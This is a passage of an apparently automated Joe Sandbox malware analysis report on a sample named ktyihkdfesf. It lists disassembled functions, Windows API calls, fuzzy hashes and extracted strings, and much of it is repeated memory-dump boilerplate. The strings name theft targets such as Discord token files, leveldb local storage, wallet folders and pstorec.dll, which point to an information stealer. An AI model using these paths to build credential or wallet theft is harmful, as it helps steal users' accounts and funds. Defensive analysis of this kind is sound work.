                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heapmemcmpstrlen$??3@AllocFileFindFirstProcessmemmovewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\*$5]A$C:\ProgramData\$Soft$\Discord\tokens.txt$\Local Storage\leveldb$\Local Storage\leveldb\CURRENT$\discord\
                                                                                                                                                                                                                                                                                                  • API String ID: 2833195460-599946814
                                                                                                                                                                                                                                                                                                  • Opcode ID: 22d85e5231fd5c98588da4317bc2df92ddf919f1e503bb07a89fd0dcdb54fc31
                                                                                                                                                                                                                                                                                                  • Instruction ID: 81ee40a3975c9a922aef849e5e8a3abd7cc697fd74e0cd7b6c267da97902711e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22d85e5231fd5c98588da4317bc2df92ddf919f1e503bb07a89fd0dcdb54fc31
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4502D571900618ABCB10EBB1CD85AEEB779BF48304F44015EF606A7151DB7CBAC5CBA9
                                                                                                                                                                                                                                                                                                  Function 0040BC30 Relevance: 58.5, APIs: 14, Strings: 19, Instructions: 704stringfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0040BC5A
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040BC6C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040BCFE
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 0040BD2F
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040BD8B
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0040BDBC
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040BE1F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcmpstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %s\*.*$.metadata-v2$C:\ProgramData\$PSk?$Plugins$Ph=$Wallets$W<?$\storage\default\$%@$+Q$N=$P>$V=$X>$]=$_>$d=$x>
                                                                                                                                                                                                                                                                                                  • API String ID: 3353021899-1404224526
                                                                                                                                                                                                                                                                                                  • Opcode ID: fa5d6ba3c41226117375902af091d81ba2687f047e57ace8c7f7fafacffe9852
                                                                                                                                                                                                                                                                                                  • Instruction ID: db501d22f0f1181e2ce2af52b6c83326310b215b830042a06cc2d5eef77a8b05
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa5d6ba3c41226117375902af091d81ba2687f047e57ace8c7f7fafacffe9852
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86425231A102189BDF04EBA1C9D59FE7769AF44308F4040AEF9066B192DF7CADC5C7A9
                                                                                                                                                                                                                                                                                                  Function 0041DD60 Relevance: 51.3, APIs: 28, Strings: 1, Instructions: 502filestringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0041DDB9
                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0041DECA
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000), ref: 0041DEE8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateFileHandlelstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: UT
                                                                                                                                                                                                                                                                                                  • API String ID: 3205445448-894488996
                                                                                                                                                                                                                                                                                                  • Opcode ID: 97c8584f83b454a8927c2d67e1d8cbb00a1e98983169f3ef51cd461a2be68698
                                                                                                                                                                                                                                                                                                  • Instruction ID: ac4f865b8f17060690429e4fd138a7650e313cba3034da994fc339625156bd58
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97c8584f83b454a8927c2d67e1d8cbb00a1e98983169f3ef51cd461a2be68698
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C12D2B5A087809FD721DF26C48479BBBE1AF95308F14482EE8C687352D738D985CB5A
                                                                                                                                                                                                                                                                                                  Function 0041D3F0 Relevance: 7.6, APIs: 5, Instructions: 109fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$FileWrite
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3457131274-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1f9a4faab0999b521a2636aa1cfc27af4b576a019f41c9991a71851e919e7845
                                                                                                                                                                                                                                                                                                  • Instruction ID: 75c582a46244fff173573742a7ab3bbcd042cdd94e8295cbfc9d5a78f2bf368e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f9a4faab0999b521a2636aa1cfc27af4b576a019f41c9991a71851e919e7845
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A03107F1A0474ABFD354DF25ED84AA7B7A8FB45308F44412AE84483B41E338F965CBA5
                                                                                                                                                                                                                                                                                                  Function 0041D850 Relevance: 6.1, APIs: 4, Instructions: 71timeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041D88A
                                                                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D894
                                                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D8AF
                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D914
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 568878067-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4f298a821ac2bbf5d00ffec94eb5c8bc91ccbc5d341f049dbc5db8ff6588eb99
                                                                                                                                                                                                                                                                                                  • Instruction ID: 853963dc4ef663bce705e73e50dc6f04fde9a019ac164f808202a007976d34a8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f298a821ac2bbf5d00ffec94eb5c8bc91ccbc5d341f049dbc5db8ff6588eb99
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A2100B28147109AE305CF29C8557B7BBE4FF94384F004A2EF0C29A252EB75D086D761
                                                                                                                                                                                                                                                                                                  Function 004011B0 Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?,7622F360,?,?,?,00401320,pstorec.dll,?,?,?,004185FC), ref: 004011DA
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1586166983-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 82e18240206d58c3fc2370882c0ef2334e6b9da6ecc00cb1c851d96badb87713
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1e243eb0cc245641358f316f4ded0038930a38816da4ddb4eced82cb662ad228
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82e18240206d58c3fc2370882c0ef2334e6b9da6ecc00cb1c851d96badb87713
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29E04F363013149BC6208B89ECC5D57BBAAEB8D7F4B5A4172EA045B326D275AC50CA64
                                                                                                                                                                                                                                                                                                  Function 0041A340 Relevance: .4, Instructions: 438COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: e350b9acc202ae44a8096b0a8b1f7fa9d4f6edb5150dc4f2344859e8333b814c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 81a96ac3c5c45741fb44ce0365675c3fdd34da691af61be43d7ddf4b7eb2458a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e350b9acc202ae44a8096b0a8b1f7fa9d4f6edb5150dc4f2344859e8333b814c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59224CB57062998FCB35CF99C9805E9B7A2BF8A310F14852EDC4D8B351C734AA47DB42
                                                                                                                                                                                                                                                                                                  Function 0041B0B0 Relevance: .3, Instructions: 328COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
